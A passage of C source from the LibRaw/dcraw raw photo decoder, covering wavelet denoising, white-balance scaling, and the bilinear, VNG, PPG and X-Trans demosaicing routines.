hpass = lpass;
}
for (i=0; i < size; i++)
image[i][c] = CLIP(SQR(fimg[i]+fimg[lpass+i])/0x10000);
}
if (filters && colors == 3) { /* pull G1 and G3 closer together */
for (row=0; row < 2; row++) {
mul[row] = 0.125 * pre_mul[FC(row+1,0) | 1] / pre_mul[FC(row,0) | 1];
blk[row] = cblack[FC(row,0) | 1];
}
for (i=0; i < 4; i++)
window[i] = (ushort *) fimg + width*i;
for (wlast=-1, row=1; row < height-1; row++) {
while (wlast < row+1) {
for (wlast++, i=0; i < 4; i++)
window[(i+3) & 3] = window[i];
for (col = FC(wlast,1) & 1; col < width; col+=2)
window[2][col] = BAYER(wlast,col);
}
thold = threshold/512;
for (col = (FC(row,0) & 1)+1; col < width-1; col+=2) {
avg = ( window[0][col-1] + window[0][col+1] +
window[2][col-1] + window[2][col+1] - blk[~row & 1]*4 )
* mul[row & 1] + (window[1][col] + blk[row & 1]) * 0.5;
avg = avg < 0 ? 0 : sqrt(avg);
diff = sqrt((double)BAYER(row,col)) - avg;
if (diff < -thold) diff += thold;
else if (diff > thold) diff -= thold;
else diff = 0;
BAYER(row,col) = CLIP(SQR(avg+diff) + 0.5);
}
}
}
free (fimg);
}
#else /* LIBRAW_USE_OPENMP */
void CLASS wavelet_denoise()
{
float *fimg=0, *temp, thold, mul[2], avg, diff;
int scale=1, size, lev, hpass, lpass, row, col, nc, c, i, wlast, blk[2];
ushort *window[4];
static const float noise[] =
{ 0.8002,0.2735,0.1202,0.0585,0.0291,0.0152,0.0080,0.0044 };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Wavelet denoising...\n"));
#endif
while (maximum << scale < 0x10000) scale++;
maximum <<= --scale;
black <<= scale;
FORC4 cblack[c] <<= scale;
if ((size = iheight*iwidth) < 0x15550000)
fimg = (float *) malloc ((size*3 + iheight + iwidth) * sizeof *fimg);
merror (fimg, "wavelet_denoise()");
temp = fimg + size*3;
if ((nc = colors) == 3 && filters) nc++;
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp parallel default(shared) private(i,col,row,thold,lev,lpass,hpass,temp,c) firstprivate(scale,size)
#endif
{
temp = (float*)malloc( (iheight + iwidth) * sizeof *fimg);
FORC(nc) { /* denoise R,G1,B,G3 individually */
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++)
fimg[i] = 256 * sqrt((double)(image[i][c] << scale));
for (hpass=lev=0; lev < 5; lev++) {
lpass = size*((lev & 1)+1);
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (row=0; row < iheight; row++) {
hat_transform (temp, fimg+hpass+row*iwidth, 1, iwidth, 1 << lev);
for (col=0; col < iwidth; col++)
fimg[lpass + row*iwidth + col] = temp[col] * 0.25;
}
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (col=0; col < iwidth; col++) {
hat_transform (temp, fimg+lpass+col, iwidth, iheight, 1 << lev);
for (row=0; row < iheight; row++)
fimg[lpass + row*iwidth + col] = temp[row] * 0.25;
}
thold = threshold * noise[lev];
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++) {
fimg[hpass+i] -= fimg[lpass+i];
if (fimg[hpass+i] < -thold) fimg[hpass+i] += thold;
else if (fimg[hpass+i] > thold) fimg[hpass+i] -= thold;
else fimg[hpass+i] = 0;
if (hpass) fimg[i] += fimg[hpass+i];
}
hpass = lpass;
}
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++)
image[i][c] = CLIP(SQR(fimg[i]+fimg[lpass+i])/0x10000);
}
free(temp);
} /* end omp parallel */
/* the following loops are hard to parallize, no idea yes,
* problem is wlast which is carrying dependency
* second part should be easyer, but did not yet get it right.
*/
if (filters && colors == 3) { /* pull G1 and G3 closer together */
for (row=0; row < 2; row++){
mul[row] = 0.125 * pre_mul[FC(row+1,0) | 1] / pre_mul[FC(row,0) | 1];
blk[row] = cblack[FC(row,0) | 1];
}
for (i=0; i < 4; i++)
window[i] = (ushort *) fimg + width*i;
for (wlast=-1, row=1; row < height-1; row++) {
while (wlast < row+1) {
for (wlast++, i=0; i < 4; i++)
window[(i+3) & 3] = window[i];
for (col = FC(wlast,1) & 1; col < width; col+=2)
window[2][col] = BAYER(wlast,col);
}
thold = threshold/512;
for (col = (FC(row,0) & 1)+1; col < width-1; col+=2) {
avg = ( window[0][col-1] + window[0][col+1] +
window[2][col-1] + window[2][col+1] - blk[~row & 1]*4 )
* mul[row & 1] + (window[1][col] + blk[row & 1]) * 0.5;
avg = avg < 0 ? 0 : sqrt(avg);
diff = sqrt((double)BAYER(row,col)) - avg;
if (diff < -thold) diff += thold;
else if (diff > thold) diff -= thold;
else diff = 0;
BAYER(row,col) = CLIP(SQR(avg+diff) + 0.5);
}
}
}
free (fimg);
}
#endif
// green equilibration
void CLASS green_matching()
{
int i,j;
double m1,m2,c1,c2;
int o1_1,o1_2,o1_3,o1_4;
int o2_1,o2_2,o2_3,o2_4;
ushort (*img)[4];
const int margin = 3;
int oj = 2, oi = 2;
float f;
const float thr = 0.01f;
if(half_size || shrink) return;
if(FC(oj, oi) != 3) oj++;
if(FC(oj, oi) != 3) oi++;
if(FC(oj, oi) != 3) oj--;
img = (ushort (*)[4]) calloc (height*width, sizeof *image);
merror (img, "green_matching()");
memcpy(img,image,height*width*sizeof *image);
for(j=oj;j<height-margin;j+=2)
for(i=oi;i<width-margin;i+=2){
o1_1=img[(j-1)*width+i-1][1];
o1_2=img[(j-1)*width+i+1][1];
o1_3=img[(j+1)*width+i-1][1];
o1_4=img[(j+1)*width+i+1][1];
o2_1=img[(j-2)*width+i][3];
o2_2=img[(j+2)*width+i][3];
o2_3=img[j*width+i-2][3];
o2_4=img[j*width+i+2][3];
m1=(o1_1+o1_2+o1_3+o1_4)/4.0;
m2=(o2_1+o2_2+o2_3+o2_4)/4.0;
c1=(abs(o1_1-o1_2)+abs(o1_1-o1_3)+abs(o1_1-o1_4)+abs(o1_2-o1_3)+abs(o1_3-o1_4)+abs(o1_2-o1_4))/6.0;
c2=(abs(o2_1-o2_2)+abs(o2_1-o2_3)+abs(o2_1-o2_4)+abs(o2_2-o2_3)+abs(o2_3-o2_4)+abs(o2_2-o2_4))/6.0;
if((img[j*width+i][3]<maximum*0.95)&&(c1<maximum*thr)&&(c2<maximum*thr))
{
f = image[j*width+i][3]*m1/m2;
image[j*width+i][3]=f>0xffff?0xffff:f;
}
}
free(img);
}
void CLASS scale_colors()
{
unsigned bottom, right, size, row, col, ur, uc, i, x, y, c, sum[8];
int val, dark, sat;
double dsum[8], dmin, dmax;
float scale_mul[4], fr, fc;
ushort *img=0, *pix;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_SCALE_COLORS,0,2);
#endif
if (user_mul[0])
memcpy (pre_mul, user_mul, sizeof pre_mul);
if (use_auto_wb || (use_camera_wb && cam_mul[0] == -1)) {
memset (dsum, 0, sizeof dsum);
bottom = MIN (greybox[1]+greybox[3], height);
right = MIN (greybox[0]+greybox[2], width);
for (row=greybox[1]; row < bottom; row += 8)
for (col=greybox[0]; col < right; col += 8) {
memset (sum, 0, sizeof sum);
for (y=row; y < row+8 && y < bottom; y++)
for (x=col; x < col+8 && x < right; x++)
FORC4 {
if (filters) {
c = fcol(y,x);
val = BAYER2(y,x);
} else
val = image[y*width+x][c];
if (val > maximum-25) goto skip_block;
if ((val -= cblack[c]) < 0) val = 0;
sum[c] += val;
sum[c+4]++;
if (filters) break;
}
FORC(8) dsum[c] += sum[c];
skip_block: ;
}
FORC4 if (dsum[c]) pre_mul[c] = dsum[c+4] / dsum[c];
}
if (use_camera_wb && cam_mul[0] != -1) {
memset (sum, 0, sizeof sum);
for (row=0; row < 8; row++)
for (col=0; col < 8; col++) {
c = FC(row,col);
if ((val = white[row][col] - cblack[c]) > 0)
sum[c] += val;
sum[c+4]++;
}
#ifdef LIBRAW_LIBRARY_BUILD
if(load_raw == &LibRaw::nikon_load_sraw)
{
// Nikon sRAW: camera WB already applied:
pre_mul[0]=pre_mul[1]=pre_mul[2]=pre_mul[3]=1.0;
}
else
#endif
if (sum[0] && sum[1] && sum[2] && sum[3])
FORC4 pre_mul[c] = (float) sum[c+4] / sum[c];
else if (cam_mul[0] && cam_mul[2])
memcpy (pre_mul, cam_mul, sizeof pre_mul);
else
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_CAMERA_WB;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Cannot use camera white balance.\n"), ifname);
#endif
}
}
#ifdef LIBRAW_LIBRARY_BUILD
// Nikon sRAW, daylight
if (load_raw == &LibRaw::nikon_load_sraw
&& !use_camera_wb && !use_auto_wb
&& cam_mul[0] > 0.001f && cam_mul[1] > 0.001f && cam_mul[2] > 0.001f )
{
for(c=0;c<3;c++)
pre_mul[c]/=cam_mul[c];
}
#endif
if (pre_mul[1] == 0) pre_mul[1] = 1;
if (pre_mul[3] == 0) pre_mul[3] = colors < 4 ? pre_mul[1] : 1;
dark = black;
sat = maximum;
if (threshold) wavelet_denoise();
maximum -= black;
for (dmin=DBL_MAX, dmax=c=0; c < 4; c++) {
if (dmin > pre_mul[c])
dmin = pre_mul[c];
if (dmax < pre_mul[c])
dmax = pre_mul[c];
}
if (!highlight) dmax = dmin;
FORC4 scale_mul[c] = (pre_mul[c] /= dmax) * 65535.0 / maximum;
#ifdef DCRAW_VERBOSE
if (verbose) {
fprintf (stderr,
_("Scaling with darkness %d, saturation %d, and\nmultipliers"), dark, sat);
FORC4 fprintf (stderr, " %f", pre_mul[c]);
fputc ('\n', stderr);
}
#endif
if (filters > 1000 && (cblack[4]+1)/2 == 1 && (cblack[5]+1)/2 == 1) {
FORC4 cblack[FC(c/2,c%2)] +=
cblack[6 + c/2 % cblack[4] * cblack[5] + c%2 % cblack[5]];
cblack[4] = cblack[5] = 0;
}
size = iheight*iwidth;
#ifdef LIBRAW_LIBRARY_BUILD
scale_colors_loop(scale_mul);
#else
for (i=0; i < size*4; i++) {
if (!(val = ((ushort *)image)[i])) continue;
if (cblack[4] && cblack[5])
val -= cblack[6 + i/4 / iwidth % cblack[4] * cblack[5] +
i/4 % iwidth % cblack[5]];
val -= cblack[i & 3];
val *= scale_mul[i & 3];
((ushort *)image)[i] = CLIP(val);
}
#endif
if ((aber[0] != 1 || aber[2] != 1) && colors == 3) {
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Correcting chromatic aberration...\n"));
#endif
for (c=0; c < 4; c+=2) {
if (aber[c] == 1) continue;
img = (ushort *) malloc (size * sizeof *img);
merror (img, "scale_colors()");
for (i=0; i < size; i++)
img[i] = image[i][c];
for (row=0; row < iheight; row++) {
ur = fr = (row - iheight*0.5) * aber[c] + iheight*0.5;
if (ur > iheight-2) continue;
fr -= ur;
for (col=0; col < iwidth; col++) {
uc = fc = (col - iwidth*0.5) * aber[c] + iwidth*0.5;
if (uc > iwidth-2) continue;
fc -= uc;
pix = img + ur*iwidth + uc;
image[row*iwidth+col][c] =
(pix[ 0]*(1-fc) + pix[ 1]*fc) * (1-fr) +
(pix[iwidth]*(1-fc) + pix[iwidth+1]*fc) * fr;
}
}
free(img);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_SCALE_COLORS,1,2);
#endif
}
void CLASS pre_interpolate()
{
ushort (*img)[4];
int row, col, c;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_PRE_INTERPOLATE,0,2);
#endif
if (shrink) {
if (half_size) {
height = iheight;
width = iwidth;
if (filters == 9) {
for (row=0; row < 3; row++)
for (col=1; col < 4; col++)
if (!(image[row*width+col][0] | image[row*width+col][2]))
goto break2; break2:
for ( ; row < height; row+=3)
for (col=(col-1)%3+1; col < width-1; col+=3) {
img = image + row*width+col;
for (c=0; c < 3; c+=2)
img[0][c] = (img[-1][c] + img[1][c]) >> 1;
}
}
} else {
img = (ushort (*)[4]) calloc (height, width*sizeof *img);
merror (img, "pre_interpolate()");
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
c = fcol(row,col);
img[row*width+col][c] = image[(row >> 1)*iwidth+(col >> 1)][c];
}
free (image);
image = img;
shrink = 0;
}
}
if (filters > 1000 && colors == 3) {
mix_green = four_color_rgb ^ half_size;
if (four_color_rgb | half_size) colors++;
else {
for (row = FC(1,0) >> 1; row < height; row+=2)
for (col = FC(row,1) & 1; col < width; col+=2)
image[row*width+col][1] = image[row*width+col][3];
filters &= ~((filters & 0x55555555) << 1);
}
}
if (half_size) filters = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_PRE_INTERPOLATE,1,2);
#endif
}
void CLASS border_interpolate (int border)
{
unsigned row, col, y, x, f, c, sum[8];
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
if (col==border && row >= border && row < height-border)
col = width-border;
memset (sum, 0, sizeof sum);
for (y=row-1; y != row+2; y++)
for (x=col-1; x != col+2; x++)
if (y < height && x < width) {
f = fcol(y,x);
sum[f] += image[y*width+x][f];
sum[f+4]++;
}
f = fcol(row,col);
FORCC if (c != f && sum[c+4])
image[row*width+col][c] = sum[c] / sum[c+4];
}
}
void CLASS lin_interpolate_loop(int code[16][16][32],int size)
{
int row;
for (row=1; row < height-1; row++)
{
int col,*ip;
ushort *pix;
for (col=1; col < width-1; col++) {
int i;
int sum[4];
pix = image[row*width+col];
ip = code[row % size][col % size];
memset (sum, 0, sizeof sum);
for (i=*ip++; i--; ip+=3)
sum[ip[2]] += pix[ip[0]] << ip[1];
for (i=colors; --i; ip+=2)
pix[ip[0]] = sum[ip[0]] * ip[1] >> 8;
}
}
}
void CLASS lin_interpolate()
{
int code[16][16][32], size=16, *ip, sum[4];
int f, c, x, y, row, col, shift, color;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Bilinear interpolation...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,0,3);
#endif
if (filters == 9) size = 6;
border_interpolate(1);
for (row=0; row < size; row++)
for (col=0; col < size; col++) {
ip = code[row][col]+1;
f = fcol(row,col);
memset (sum, 0, sizeof sum);
for (y=-1; y <= 1; y++)
for (x=-1; x <= 1; x++) {
shift = (y==0) + (x==0);
color = fcol(row+y,col+x);
if (color == f) continue;
*ip++ = (width*y + x)*4 + color;
*ip++ = shift;
*ip++ = color;
sum[color] += 1 << shift;
}
code[row][col][0] = (ip - code[row][col]) / 3;
FORCC
if (c != f) {
*ip++ = c;
*ip++ = sum[c]>0?256 / sum[c]:0;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,1,3);
#endif
lin_interpolate_loop(code,size);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,2,3);
#endif
}
/*
This algorithm is officially called:
"Interpolation using a Threshold-based variable number of gradients"
described in http://scien.stanford.edu/pages/labsite/1999/psych221/projects/99/tingchen/algodep/vargra.html
I've extended the basic idea to work with non-Bayer filter arrays.
Gradients are numbered clockwise from NW=0 to W=7.
*/
void CLASS vng_interpolate()
{
static const signed char *cp, terms[] = {
-2,-2,+0,-1,0,0x01, -2,-2,+0,+0,1,0x01, -2,-1,-1,+0,0,0x01,
-2,-1,+0,-1,0,0x02, -2,-1,+0,+0,0,0x03, -2,-1,+0,+1,1,0x01,
-2,+0,+0,-1,0,0x06, -2,+0,+0,+0,1,0x02, -2,+0,+0,+1,0,0x03,
-2,+1,-1,+0,0,0x04, -2,+1,+0,-1,1,0x04, -2,+1,+0,+0,0,0x06,
-2,+1,+0,+1,0,0x02, -2,+2,+0,+0,1,0x04, -2,+2,+0,+1,0,0x04,
-1,-2,-1,+0,0,-128, -1,-2,+0,-1,0,0x01, -1,-2,+1,-1,0,0x01,
-1,-2,+1,+0,1,0x01, -1,-1,-1,+1,0,-120, -1,-1,+1,-2,0,0x40,
-1,-1,+1,-1,0,0x22, -1,-1,+1,+0,0,0x33, -1,-1,+1,+1,1,0x11,
-1,+0,-1,+2,0,0x08, -1,+0,+0,-1,0,0x44, -1,+0,+0,+1,0,0x11,
-1,+0,+1,-2,1,0x40, -1,+0,+1,-1,0,0x66, -1,+0,+1,+0,1,0x22,
-1,+0,+1,+1,0,0x33, -1,+0,+1,+2,1,0x10, -1,+1,+1,-1,1,0x44,
-1,+1,+1,+0,0,0x66, -1,+1,+1,+1,0,0x22, -1,+1,+1,+2,0,0x10,
-1,+2,+0,+1,0,0x04, -1,+2,+1,+0,1,0x04, -1,+2,+1,+1,0,0x04,
+0,-2,+0,+0,1,-128, +0,-1,+0,+1,1,-120, +0,-1,+1,-2,0,0x40,
+0,-1,+1,+0,0,0x11, +0,-1,+2,-2,0,0x40, +0,-1,+2,-1,0,0x20,
+0,-1,+2,+0,0,0x30, +0,-1,+2,+1,1,0x10, +0,+0,+0,+2,1,0x08,
+0,+0,+2,-2,1,0x40, +0,+0,+2,-1,0,0x60, +0,+0,+2,+0,1,0x20,
+0,+0,+2,+1,0,0x30, +0,+0,+2,+2,1,0x10, +0,+1,+1,+0,0,0x44,
+0,+1,+1,+2,0,0x10, +0,+1,+2,-1,1,0x40, +0,+1,+2,+0,0,0x60,
+0,+1,+2,+1,0,0x20, +0,+1,+2,+2,0,0x10, +1,-2,+1,+0,0,-128,
+1,-1,+1,+1,0,-120, +1,+0,+1,+2,0,0x08, +1,+0,+2,-1,0,0x40,
+1,+0,+2,+1,0,0x10
}, chood[] = { -1,-1, -1,0, -1,+1, 0,+1, +1,+1, +1,0, +1,-1, 0,-1 };
ushort (*brow[5])[4], *pix;
int prow=8, pcol=2, *ip, *code[16][16], gval[8], gmin, gmax, sum[4];
int row, col, x, y, x1, x2, y1, y2, t, weight, grads, color, diag;
int g, diff, thold, num, c;
lin_interpolate();
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("VNG interpolation...\n"));
#endif
if (filters == 1) prow = pcol = 16;
if (filters == 9) prow = pcol = 6;
ip = (int *) calloc (prow*pcol, 1280);
merror (ip, "vng_interpolate()");
for (row=0; row < prow; row++) /* Precalculate for VNG */
for (col=0; col < pcol; col++) {
code[row][col] = ip;
for (cp=terms, t=0; t < 64; t++) {
y1 = *cp++; x1 = *cp++;
y2 = *cp++; x2 = *cp++;
weight = *cp++;
grads = *cp++;
color = fcol(row+y1,col+x1);
if (fcol(row+y2,col+x2) != color) continue;
diag = (fcol(row,col+1) == color && fcol(row+1,col) == color) ? 2:1;
if (abs(y1-y2) == diag && abs(x1-x2) == diag) continue;
*ip++ = (y1*width + x1)*4 + color;
*ip++ = (y2*width + x2)*4 + color;
*ip++ = weight;
for (g=0; g < 8; g++)
if (grads & 1<<g) *ip++ = g;
*ip++ = -1;
}
*ip++ = INT_MAX;
for (cp=chood, g=0; g < 8; g++) {
y = *cp++; x = *cp++;
*ip++ = (y*width + x) * 4;
color = fcol(row,col);
if (fcol(row+y,col+x) != color && fcol(row+y*2,col+x*2) == color)
*ip++ = (y*width + x) * 8 + color;
else
*ip++ = 0;
}
}
brow[4] = (ushort (*)[4]) calloc (width*3, sizeof **brow);
merror (brow[4], "vng_interpolate()");
for (row=0; row < 3; row++)
brow[row] = brow[4] + row*width;
for (row=2; row < height-2; row++) { /* Do VNG interpolation */
#ifdef LIBRAW_LIBRARY_BUILD
if(!((row-2)%256))RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,(row-2)/256+1,((height-3)/256)+1);
#endif
for (col=2; col < width-2; col++) {
pix = image[row*width+col];
ip = code[row % prow][col % pcol];
memset (gval, 0, sizeof gval);
while ((g = ip[0]) != INT_MAX) { /* Calculate gradients */
diff = ABS(pix[g] - pix[ip[1]]) << ip[2];
gval[ip[3]] += diff;
ip += 5;
if ((g = ip[-1]) == -1) continue;
gval[g] += diff;
while ((g = *ip++) != -1)
gval[g] += diff;
}
ip++;
gmin = gmax = gval[0]; /* Choose a threshold */
for (g=1; g < 8; g++) {
if (gmin > gval[g]) gmin = gval[g];
if (gmax < gval[g]) gmax = gval[g];
}
if (gmax == 0) {
memcpy (brow[2][col], pix, sizeof *image);
continue;
}
thold = gmin + (gmax >> 1);
memset (sum, 0, sizeof sum);
color = fcol(row,col);
for (num=g=0; g < 8; g++,ip+=2) { /* Average the neighbors */
if (gval[g] <= thold) {
FORCC
if (c == color && ip[1])
sum[c] += (pix[c] + pix[ip[1]]) >> 1;
else
sum[c] += pix[ip[0] + c];
num++;
}
}
FORCC { /* Save to buffer */
t = pix[color];
if (c != color)
t += (sum[c] - sum[color]) / num;
brow[2][col][c] = CLIP(t);
}
}
if (row > 3) /* Write buffer to image */
memcpy (image[(row-2)*width+2], brow[0]+2, (width-4)*sizeof *image);
for (g=0; g < 4; g++)
brow[(g-1) & 3] = brow[g];
}
memcpy (image[(row-2)*width+2], brow[0]+2, (width-4)*sizeof *image);
memcpy (image[(row-1)*width+2], brow[1]+2, (width-4)*sizeof *image);
free (brow[4]);
free (code[0][0]);
}
/*
Patterned Pixel Grouping Interpolation by Alain Desbiolles
*/
void CLASS ppg_interpolate()
{
int dir[5] = { 1, width, -1, -width, 1 };
int row, col, diff[2], guess[2], c, d, i;
ushort (*pix)[4];
border_interpolate(3);
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("PPG interpolation...\n"));
#endif
/* Fill in the green layer with gradients and pattern recognition: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,0,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=3; row < height-3; row++)
for (col=3+(FC(row,3) & 1), c=FC(row,col); col < width-3; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]) > 0; i++) {
guess[i] = (pix[-d][1] + pix[0][c] + pix[d][1]) * 2
- pix[-2*d][c] - pix[2*d][c];
diff[i] = ( ABS(pix[-2*d][c] - pix[ 0][c]) +
ABS(pix[ 2*d][c] - pix[ 0][c]) +
ABS(pix[ -d][1] - pix[ d][1]) ) * 3 +
( ABS(pix[ 3*d][1] - pix[ d][1]) +
ABS(pix[-3*d][1] - pix[-d][1]) ) * 2;
}
d = dir[i = diff[0] > diff[1]];
pix[0][1] = ULIM(guess[i] >> 2, pix[d][1], pix[-d][1]);
}
/* Calculate red and blue for each green pixel: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,1,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=1; row < height-1; row++)
for (col=1+(FC(row,2) & 1), c=FC(row,col+1); col < width-1; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]) > 0; c=2-c, i++)
pix[0][c] = CLIP((pix[-d][c] + pix[d][c] + 2*pix[0][1]
- pix[-d][1] - pix[d][1]) >> 1);
}
/* Calculate blue for red pixels and vice versa: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,2,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=1; row < height-1; row++)
for (col=1+(FC(row,1) & 1), c=2-FC(row,col); col < width-1; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]+dir[i+1]) > 0; i++) {
diff[i] = ABS(pix[-d][c] - pix[d][c]) +
ABS(pix[-d][1] - pix[0][1]) +
ABS(pix[ d][1] - pix[0][1]);
guess[i] = pix[-d][c] + pix[d][c] + 2*pix[0][1]
- pix[-d][1] - pix[d][1];
}
if (diff[0] != diff[1])
pix[0][c] = CLIP(guess[diff[0] > diff[1]] >> 1);
else
pix[0][c] = CLIP((guess[0]+guess[1]) >> 2);
}
}
void CLASS cielab (ushort rgb[3], short lab[3])
{
int c, i, j, k;
float r, xyz[3];
#ifdef LIBRAW_NOTHREADS
static float cbrt[0x10000], xyz_cam[3][4];
#else
#define cbrt tls->ahd_data.cbrt
#define xyz_cam tls->ahd_data.xyz_cam
#endif
if (!rgb) {
#ifndef LIBRAW_NOTHREADS
if(cbrt[0] < -1.0f)
#endif
for (i=0; i < 0x10000; i++) {
r = i / 65535.0;
cbrt[i] = r > 0.008856 ? pow(r,1.f/3.0f) : 7.787f*r + 16.f/116.0f;
}
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
for (xyz_cam[i][j] = k=0; k < 3; k++)
xyz_cam[i][j] += xyz_rgb[i][k] * rgb_cam[k][j] / d65_white[i];
return;
}
xyz[0] = xyz[1] = xyz[2] = 0.5;
FORCC {
xyz[0] += xyz_cam[0][c] * rgb[c];
xyz[1] += xyz_cam[1][c] * rgb[c];
xyz[2] += xyz_cam[2][c] * rgb[c];
}
xyz[0] = cbrt[CLIP((int) xyz[0])];
xyz[1] = cbrt[CLIP((int) xyz[1])];
xyz[2] = cbrt[CLIP((int) xyz[2])];
lab[0] = 64 * (116 * xyz[1] - 16);
lab[1] = 64 * 500 * (xyz[0] - xyz[1]);
lab[2] = 64 * 200 * (xyz[1] - xyz[2]);
#ifndef LIBRAW_NOTHREADS
#undef cbrt
#undef xyz_cam
#endif
}
#define TS 512 /* Tile Size */
#define fcol(row,col) xtrans[(row+6) % 6][(col+6) % 6]
/*
Frank Markesteijn's algorithm for Fuji X-Trans sensors
*/
void CLASS xtrans_interpolate (int passes)
{
int c, d, f, g, h, i, v, ng, row, col, top, left, mrow, mcol;
#ifdef LIBRAW_LIBRARY_BUILD
int cstat[4]={0,0,0,0};
#endif
int val, ndir, pass, hm[8], avg[4], color[3][8];
static const short orth[12] = { 1,0,0,1,-1,0,0,-1,1,0,0,1 },
patt[2][16] = { { 0,1,0,-1,2,0,-1,0,1,1,1,-1,0,0,0,0 },
{ 0,1,0,-2,1,0,-2,0,1,1,-2,-2,1,-1,-1,1 } },
dir[4] = { 1,TS,TS+1,TS-1 };
short allhex[3][3][2][8], *hex;
ushort min, max, sgrow, sgcol;
ushort (*rgb)[TS][TS][3], (*rix)[3], (*pix)[4];
short (*lab) [TS][3], (*lix)[3];
float (*drv)[TS][TS], diff[6], tr;
char (*homo)[TS][TS], *buffer;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("%d-pass X-Trans interpolation...\n"), passes);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(width < TS || height < TS)
throw LIBRAW_EXCEPTION_IO_CORRUPT; // too small image
/* Check against right pattern */
for (row = 0; row < 6; row++)
for (col = 0; col < 6; col++)
cstat[fcol(row,col)]++;
if(cstat[0] < 6 || cstat[0]>10 || cstat[1]< 16
|| cstat[1]>24 || cstat[2]< 6 || cstat[2]>10 || cstat[3])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
// Init allhex table to unreasonable values
for(int i = 0; i < 3; i++)
for(int j = 0; j < 3; j++)
for(int k = 0; k < 2; k++)
for(int l = 0; l < 8; l++)
allhex[i][j][k][l]=32700;
#endif
cielab (0,0);
ndir = 4 << (passes > 1);
buffer = (char *) malloc (TS*TS*(ndir*11+6));
merror (buffer, "xtrans_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*) [TS][3])(buffer + TS*TS*(ndir*6));
drv = (float (*)[TS][TS]) (buffer + TS*TS*(ndir*6+6));
homo = (char (*)[TS][TS]) (buffer + TS*TS*(ndir*10+6));
int minv=0,maxv=0,minh=0,maxh=0;
/* Map a green hexagon around each non-green pixel and vice versa: */
for (row=0; row < 3; row++)
for (col=0; col < 3; col++)
for (ng=d=0; d < 10; d+=2) {
g = fcol(row,col) == 1;
if (fcol(row+orth[d],col+orth[d+2]) == 1) ng=0; else ng++;
if (ng == 4) { sgrow = row; sgcol = col; }
if (ng == g+1) FORC(8) {
v = orth[d ]*patt[g][c*2] + orth[d+1]*patt[g][c*2+1];
h = orth[d+2]*patt[g][c*2] + orth[d+3]*patt[g][c*2+1];
minv=MIN(v,minv);
maxv=MAX(v,maxv);
minh=MIN(v,minh);
maxh=MAX(v,maxh);
allhex[row][col][0][c^(g*2 & d)] = h + v*width;
allhex[row][col][1][c^(g*2 & d)] = h + v*TS;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
// Check allhex table initialization
for(int i = 0; i < 3; i++)
for(int j = 0; j < 3; j++)
for(int k = 0; k < 2; k++)
for(int l = 0; l < 8; l++)
if(allhex[i][j][k][l]>maxh+maxv*width+1 || allhex[i][j][k][l]<minh+minv*width-1)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
int retrycount = 0;
#endif
/* Set green1 and green3 to the minimum and maximum allowed values: */
for (row=2; row < height-2; row++)
for (min=~(max=0), col=2; col < width-2; col++) {
if (fcol(row,col) == 1 && (min=~(max=0))) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][0];
if (!max) FORC(6) {
val = pix[hex[c]][1];
if (min > val) min = val;
if (max < val) max = val;
}
pix[0][1] = min;
pix[0][3] = max;
switch ((row-sgrow) % 3) {
case 1: if (row < height-3) { row++; col--; } break;
case 2:
if ((min = ~(max = 0)) && (col += 2) < width - 3 && row > 2)
{
row--;
#ifdef LIBRAW_LIBRARY_BUILD
if(retrycount++ > width*height)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
}
}
}
